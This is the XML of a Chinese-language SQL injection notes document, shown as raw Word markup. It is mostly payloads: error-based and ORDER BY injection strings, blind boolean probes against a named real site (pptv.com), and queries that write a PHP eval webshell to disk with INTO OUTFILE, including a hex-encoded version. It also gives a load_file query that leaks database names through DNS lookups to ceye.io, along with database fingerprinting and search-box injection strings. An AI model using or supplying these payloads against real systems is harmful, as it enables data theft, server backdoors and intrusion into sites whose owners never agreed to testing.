        <w:ind w:firstLineChars="1400" w:firstLine="2940"/>
      </w:pPr>
      <w:r>
        <w:t>to use near 'and 1=2,1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617747D" w14:textId="3889270D" w:rsidR="00CA794F" w:rsidRDefault="00B5783C" w:rsidP="00DD007F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00ABE608" wp14:editId="5DA47F3F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520700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides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6391C" w14:textId="0863CB4D" w:rsidR="00CA794F" w:rsidRDefault="00CA794F" w:rsidP="00DD007F">
      <w:r w:rsidRPr="00CA794F">
        <w:t>?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,database())),2)--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777AFDA5" w14:textId="54C43EB9" w:rsidR="00B704F6" w:rsidRDefault="00B704F6" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B704F6">
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>0 procedure analyse(extractvalue(rand(),concat(0x3a,(select (table_name) frominformation_schema.tables where table_schema=database() limit 1,1))),1)--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A712FB" w14:textId="27913E60" w:rsidR="00B704F6" w:rsidRDefault="00B704F6" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A12AA84" w14:textId="58B4CEA4" w:rsidR="005227D7" w:rsidRDefault="005227D7" w:rsidP="005227D7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rderby注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A08620" w14:textId="77777777" w:rsidR="005227D7" w:rsidRPr="005227D7" w:rsidRDefault="005227D7" w:rsidP="005227D7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27D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>当页面出现mysql报错信息时，注入点在 order by后面，此时可以利用报错信息进行注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D319227" w14:textId="4D27DF71" w:rsidR="00B704F6" w:rsidRDefault="005227D7" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19EAF1D3" wp14:editId="05920073">
            <wp:extent cx="3171825" cy="32099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C334" w14:textId="77777777" w:rsidR="005227D7" w:rsidRPr="005227D7" w:rsidRDefault="005227D7" w:rsidP="005227D7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27D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其中select * from users order by id desc;的desc是可控的传参值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506349AA" w14:textId="77777777" w:rsidR="005227D7" w:rsidRPr="005227D7" w:rsidRDefault="005227D7" w:rsidP="005227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27D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3DD94" w14:textId="0B5576D0" w:rsidR="005227D7" w:rsidRDefault="005227D7" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E154E75" w14:textId="77777777" w:rsidR="000C59ED" w:rsidRPr="000C59ED" w:rsidRDefault="000C59ED" w:rsidP="000C59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59ED">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>order by if(1=1,id,username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BBBEC2" w14:textId="77777777" w:rsidR="000C59ED" w:rsidRPr="000C59ED" w:rsidRDefault="000C59ED" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4213AAB1" w14:textId="43907E1C" w:rsidR="005227D7" w:rsidRDefault="000C59ED" w:rsidP="00DD007F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案例:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE30D22" w14:textId="2BBC5EC5" w:rsidR="005227D7" w:rsidRDefault="005227D7" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0420E284" wp14:editId="09EE6F71">
            <wp:extent cx="5274310" cy="1903095"/>
            <wp:effectExtent l="0" t="0" r="254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6F86" w14:textId="3915DCAA" w:rsidR="000C59ED" w:rsidRDefault="00BB3AB0" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId101" w:history="1">
        <w:r w:rsidR="000C59ED" w:rsidRPr="005A3B24">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="13"/>
            <w:szCs w:val="13"/>
          </w:rPr>
          <w:t>https://www.uedbox.com/post/10853/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16BF3975" w14:textId="77777777" w:rsidR="000C59ED" w:rsidRDefault="000C59ED" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C102615" w14:textId="2EBC05D2" w:rsidR="000C59ED" w:rsidRDefault="00BB3AB0" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId102" w:history="1">
        <w:r w:rsidR="000C59ED" w:rsidRPr="005A3B24">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="13"/>
            <w:szCs w:val="13"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/icez/p/Mysql-Order-By-Injection-Summary.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="018A85F9" w14:textId="634BA5BB" w:rsidR="000C59ED" w:rsidRDefault="000C59ED" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6821D903" w14:textId="523DA750" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44FAC">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">http://www.pptv.com/?t=ing&amp;sort=join_cnt,if((4&gt;3),1,(select 1 from information_schema.tables))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A309C92" w14:textId="38391B69" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44FAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD69EF" w14:textId="301F2329" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44FAC">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>http://www.pptv.com/?t=ing&amp;sort=join_cnt,if((4&gt;5),1,(select 1 from information_schema.tables))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35949E6F" w14:textId="70795705" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44FAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>不正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C3BC5" w14:textId="77777777" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01355883" w14:textId="77777777" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44FAC">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://www.pptv.com/?t=ing&amp;sort=join_cnt,if((ascii(mid(version(),1,1))&gt;52),1,(select 1 from information_schema.tables))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756CE93E" w14:textId="3204E797" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44FAC">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1ACA9D" w14:textId="77777777" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44FAC">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>http://www.pptv.com/?t=ing&amp;sort=join_cnt,if((ascii(mid(version(),1,1))&gt;53),1,(select 1 from information_schema.tables))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29D109" w14:textId="01C9F078" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44FAC">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>不正常数据库版本的第一个字符的ascii为53，为数字5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F87F8" w14:textId="2A8012E8" w:rsidR="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F"/>
    <w:p w14:paraId="0E6211A5" w14:textId="77777777" w:rsidR="00E44FAC" w:rsidRPr="00E44FAC" w:rsidRDefault="00E44FAC" w:rsidP="00DD007F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640D3983" w14:textId="769C32AB" w:rsidR="00ED0EC3" w:rsidRDefault="00ED0EC3" w:rsidP="00724E9A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ysql写shell技巧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150C41A" w14:textId="0D6533D2" w:rsidR="00EC1457" w:rsidRDefault="00EC1457" w:rsidP="00ED0EC3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（前提是具备写入权限）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325AA9E1" w14:textId="4F08561C" w:rsidR="00ED0EC3" w:rsidRDefault="00BB3AB0" w:rsidP="00ED0EC3">
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidR="00ED0EC3" w:rsidRPr="00015D30">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/qing123/p/6771858.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DDC3E67" w14:textId="622829D6" w:rsidR="00E92EEE" w:rsidRDefault="00BB3AB0" w:rsidP="00ED0EC3">
      <w:hyperlink r:id="rId104" w:history="1">
        <w:r w:rsidR="00E92EEE" w:rsidRPr="00015D30">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://xz.aliyun.com/t/2460</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33C62B49" w14:textId="77777777" w:rsidR="00E92EEE" w:rsidRPr="00E92EEE" w:rsidRDefault="00E92EEE" w:rsidP="00ED0EC3"/>
    <w:p w14:paraId="2953B091" w14:textId="6D41C521" w:rsidR="00ED0EC3" w:rsidRDefault="00E92EEE" w:rsidP="00ED0EC3"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dumpfile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数写shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1BB1B" w14:textId="7E495DAD" w:rsidR="00E92EEE" w:rsidRDefault="00756E3A" w:rsidP="00ED0EC3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容+into</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dumpfile绝对路径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0D463FE" wp14:editId="2F0CCE15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5274310" cy="307340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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DAD4F" w14:textId="3C481123" w:rsidR="00A01914" w:rsidRDefault="00A01914" w:rsidP="00ED0EC3"/>
    <w:p w14:paraId="290E6B5F" w14:textId="7CD6A3FC" w:rsidR="00D53865" w:rsidRDefault="00D53865" w:rsidP="00ED0EC3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不支持union</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话用 into</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>outfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C633DF" w14:textId="1A5EAA3A" w:rsidR="00D53865" w:rsidRDefault="00D53865" w:rsidP="00ED0EC3">
      <w:r>
        <w:t>语法：select * from admin where id=1 into outfile ‘F:\WWW\phpinfo.php’ fields terminated by ‘&lt;? phpinfo(); ?&gt;’%23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30572276" w14:textId="77777777" w:rsidR="005E4753" w:rsidRDefault="005E4753" w:rsidP="005E4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ind w:left="75" w:right="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4753">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?id=1 union select 1,"&lt;?php @eval($_POST['g']);?&gt;",3 into outfile 'E:/study/WWW/evil.php'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215E0E5" w14:textId="77777777" w:rsidR="005E4753" w:rsidRDefault="005E4753" w:rsidP="005E4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ind w:left="75" w:right="75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A88188" w14:textId="19D1D645" w:rsidR="005E4753" w:rsidRPr="005E4753" w:rsidRDefault="005E4753" w:rsidP="005E4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ind w:left="75" w:right="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4753">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "E:/study/WWW/evil.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB5275F" w14:textId="74F58240" w:rsidR="00ED61FB" w:rsidRPr="005E4753" w:rsidRDefault="00ED61FB" w:rsidP="00ED0EC3"/>
    <w:p w14:paraId="0992CE29" w14:textId="0F34642C" w:rsidR="009A4AF5" w:rsidRDefault="009A4AF5" w:rsidP="00ED0EC3"/>
    <w:p w14:paraId="67F3B616" w14:textId="0045076E" w:rsidR="007814B7" w:rsidRDefault="007814B7" w:rsidP="00ED0EC3">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ns+load</w:t>
      </w:r>
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file读取文件</w:t>
      </w:r>
      <w:r w:rsidR="001445BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> （同样要求高权限）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543251A2" w14:textId="21A669E2" w:rsidR="009A4AF5" w:rsidRDefault="009A4AF5" w:rsidP="00ED0EC3">
      <w:r>
        <w:t>关于使用dns解析来让盲注更加简单。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>首先看下load_file()这个函数，这个函数可以用来发送dns解析请求。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>然后使用类似的语句：select id from admin where id=1 and if((select load_file(concat('\\\\',(select database()),'.ceye.io\\abc'))),1,1);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>即可成功将database()解析到域名的dns前面。前提是支持读文件权限，这个在实战中占的比列大概只有%30左右吧。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0838C498" w14:textId="19C3BFCD" w:rsidR="00DC6197" w:rsidRDefault="00DC6197" w:rsidP="00ED0EC3"/>
    <w:p w14:paraId="05A1CB0E" w14:textId="0F44D0CB" w:rsidR="00DC6197" w:rsidRDefault="00DC6197" w:rsidP="00ED0EC3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>骚姿势:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530284A1" w14:textId="6E37850E" w:rsidR="00DC6197" w:rsidRDefault="00DC6197" w:rsidP="00ED0EC3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F85BFA" wp14:editId="093A39B0">
            <wp:extent cx="5274310" cy="23952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E7BB" w14:textId="77777777" w:rsidR="00724E9A" w:rsidRPr="00ED0EC3" w:rsidRDefault="00724E9A" w:rsidP="00ED0EC3"/>
    <w:p w14:paraId="554640BC" w14:textId="103278EA" w:rsidR="00E54E3C" w:rsidRDefault="00E54E3C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数据库判断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B557163" w14:textId="77777777" w:rsidR="00ED0EC3" w:rsidRDefault="00ED0EC3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1529814" w14:textId="4536757E" w:rsidR="00E54E3C" w:rsidRPr="00E54E3C" w:rsidRDefault="00E54E3C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4E3C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//判断是否是 Mysql数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A11228" w14:textId="77777777" w:rsidR="00E54E3C" w:rsidRPr="00E54E3C" w:rsidRDefault="00E54E3C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4E3C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from information_schema.tables) #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764248AB" w14:textId="77777777" w:rsidR="00E54E3C" w:rsidRPr="00E54E3C" w:rsidRDefault="00E54E3C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EAB48A" w14:textId="77777777" w:rsidR="00E54E3C" w:rsidRPr="00E54E3C" w:rsidRDefault="00E54E3C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4E3C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//判断是否是 access数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321D0C0B" w14:textId="77777777" w:rsidR="00E54E3C" w:rsidRPr="00E54E3C" w:rsidRDefault="00E54E3C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4E3C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from msysobjects) #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F63C9C8" w14:textId="77777777" w:rsidR="00E54E3C" w:rsidRPr="00E54E3C" w:rsidRDefault="00E54E3C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240B195" w14:textId="77777777" w:rsidR="00E54E3C" w:rsidRPr="00E54E3C" w:rsidRDefault="00E54E3C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4E3C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//判断是否是 Sqlserver数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E97640" w14:textId="4C6B4480" w:rsidR="00E54E3C" w:rsidRDefault="00E54E3C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4E3C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from sysobjects) #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2FB020" w14:textId="77777777" w:rsidR="008E610F" w:rsidRPr="00E54E3C" w:rsidRDefault="008E610F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C1DE1A" w14:textId="4157DAA7" w:rsidR="00E54E3C" w:rsidRDefault="008E610F" w:rsidP="008E610F">
      <w:r>
        <w:t>and exists(select * from dual)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40268386" w14:textId="2A049481" w:rsidR="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索框注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B68389F" w14:textId="77777777" w:rsidR="002A5D7C" w:rsidRPr="009B36FD" w:rsidRDefault="002A5D7C" w:rsidP="002A5D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sp+access搜索框注入</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://ishare.iask.sina.com.cn/f/itZ5pncG55.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FFA4F5" w14:textId="1F02B31D" w:rsidR="002A5D7C" w:rsidRDefault="002A5D7C" w:rsidP="00034129"/>
    <w:p w14:paraId="459E1EB3" w14:textId="77777777" w:rsidR="002A5D7C" w:rsidRPr="002A5D7C" w:rsidRDefault="002A5D7C" w:rsidP="00034129"/>
    <w:p w14:paraId="4297C6D8" w14:textId="71DBE503" w:rsidR="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A">
      <w:r>
        <w:t>SELECT*from sqltest where names like ‘%要查询的关键字%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED868C" w14:textId="60449CD6" w:rsidR="008F0A7A" w:rsidRDefault="00483503" w:rsidP="00483503">
      <w:pPr>
        <w:ind w:firstLineChars="1900" w:firstLine="3990"/>
      </w:pPr>
      <w:r>
        <w:t>张%‘and’1’=‘1’and’%’=’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB64AD6" w14:textId="3B056424" w:rsidR="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A">
      <w:r>
        <w:t>SELECT* from sqltest where names like’%张%‘and’1’=‘1’and’%’=’%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DF91F1" w14:textId="77777777" w:rsidR="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A"/>
    <w:p w14:paraId="553206C1" w14:textId="77777777" w:rsidR="008F0A7A" w:rsidRPr="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A"/>
    <w:p w14:paraId="79B5FD20" w14:textId="77777777" w:rsidR="000A449A" w:rsidRPr="000A449A" w:rsidRDefault="000A449A" w:rsidP="000A449A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A449A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>//，-- , /**/, #, --+, -- -, ;,%00,--a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BCACA9" w14:textId="77777777" w:rsidR="0034210A" w:rsidRDefault="006F7A6B" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“/*”是MySQL中的注释符，返回错误说明该注入点不是MySQL；</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>“--”是Oracle和MSSQL支持的注释符，如果返回正常，则说明为这两种数据库类型之一</w:t>
      </w:r>
      <w:r w:rsidR="0034210A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
